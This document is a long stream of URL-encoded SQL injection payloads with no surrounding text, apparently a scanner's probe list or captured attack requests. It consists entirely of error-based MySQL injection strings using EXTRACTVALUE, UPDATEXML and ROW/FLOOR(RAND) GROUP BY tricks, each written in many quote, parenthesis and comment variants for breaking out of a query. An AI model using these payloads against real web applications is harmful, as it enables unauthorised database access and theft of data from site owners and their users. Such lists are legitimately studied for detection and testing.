1%25%27%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27qRIW%27%3D%27qRIW 1%00%27%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27bHKX%27%3D%27bHKX 1%27%29%20WHERE%208006%3D8006%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%22%29%20WHERE%207186%3D7186%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%27%20WHERE%201598%3D1598%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%22%20WHERE%208721%3D8721%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%27%7C%7C%28SELECT%20%27zkjb%27%20FROM%20DUAL%20WHERE%203129%3D3129%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27YcQF%27%20WHERE%201743%3D1743%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20lNMF%20WHERE%204805%3D4805%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27TuZl%27%20WHERE%202912%3D2912%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%23 1%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29 1%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%287286%3D7286 1%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%288026%3D8026 1%29%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%284217%3D4217 1%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29 1%29%20WHERE%208941%3D8941%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20--%20 1%20WHERE%206171%3D6171%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20--%20 1%27%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29 1%27%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29 1%22%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29 1%27%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%27mrMG%27%3D%27mrMG 1%27%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%27ZjHZ%27%3D%27ZjHZ 1%27%29%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%28%27RADS%27%3D%27RADS 1%27%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%27DngQ%27%3D%27DngQ 1%27%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%27Blan%27%20LIKE%20%27Blan 1%27%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%27gISx%27%20LIKE%20%27gISx 1%27%29%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%28%27aWdN%27%20LIKE%20%27aWdN 1%27%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%27yNmr%27%20LIKE%20%27yNmr 1%22%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%22PsAp%22%3D%22PsAp 1%22%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%22GPnd%22%3D%22GPnd 1%22%29%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%28%22TjJb%22%3D%22TjJb 1%22%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%22ITad%22%3D%22ITad 1%22%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%22LWyj%22%20LIKE%20%22LWyj 1%22%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%22lAPM%22%20LIKE%20%22lAPM 1%22%29%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%28%22SvPs%22%20LIKE%20%22SvPs 1%22%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%22GuEU%22%20LIKE%20%22GuEU 1%25%27%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%27%25%27%3D%27 1%00%27%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%28%27cbxN%27%3D%27cbxN 1%00%27%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20AND%20%27AYVv%27%3D%27AYVv 1%27%29%20WHERE%204126%3D4126%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20--%20 1%22%29%20WHERE%201897%3D1897%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20--%20 1%27%20WHERE%201897%3D1897%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20--%20 1%22%20WHERE%203223%3D3223%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20--%20 1%27%7C%7C%28SELECT%20%27DPAJ%27%20FROM%20DUAL%20WHERE%205482%3D5482%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27qQir%27%20WHERE%208264%3D8264%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20%29%7C%7C%27 1%27%2B%28SELECT%20PAre%20WHERE%208798%3D8798%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20%29%2B%27 1%27%2B%28SELECT%20%27EPkf%27%20WHERE%207633%3D7633%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20OR%20UPDATEXML%289152%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289152%3D9152%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7257%29%20%23 -1899%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29 -8916%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%289979%3D9979 -8685%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%281855%3D1855 -8234%29%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%287095%3D7095 -9343%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29 -2090%29%20WHERE%208735%3D8735%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20--%20 -2783%20WHERE%204341%3D4341%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20--%20 -3050%27%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29 -9736%27%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29 -1422%22%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29 -9086%27%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%27Lweq%27%3D%27Lweq -5557%27%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27xWiu%27%3D%27xWiu -7473%27%29%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27sKub%27%3D%27sKub -9598%27%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%27xdoD%27%3D%27xdoD -9137%27%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%27Pcjo%27%20LIKE%20%27Pcjo -7407%27%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27wmMA%27%20LIKE%20%27wmMA -7593%27%29%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27LTGT%27%20LIKE%20%27LTGT -3871%27%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%27Ushc%27%20LIKE%20%27Ushc -1606%22%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%22yfLp%22%3D%22yfLp -2834%22%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22UmsA%22%3D%22UmsA -2496%22%29%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22rQeg%22%3D%22rQeg -7430%22%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%22DBDf%22%3D%22DBDf -4642%22%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%22NJhK%22%20LIKE%20%22NJhK -2273%22%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22Qomi%22%20LIKE%20%22Qomi -6192%22%29%29%29%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22RKQC%22%20LIKE%20%22RKQC -1346%22%20OR%20ROW%282252%2C2192%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%282252%3D2252%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203762%20UNION%20SELECT%204558%20UNION%20SELECT%209226%20UNION%20SELECT%204636%29a%20GROUP%20BY%20x%29%20AND%20%22OFpc%22%20LIKE%20%22OFpc 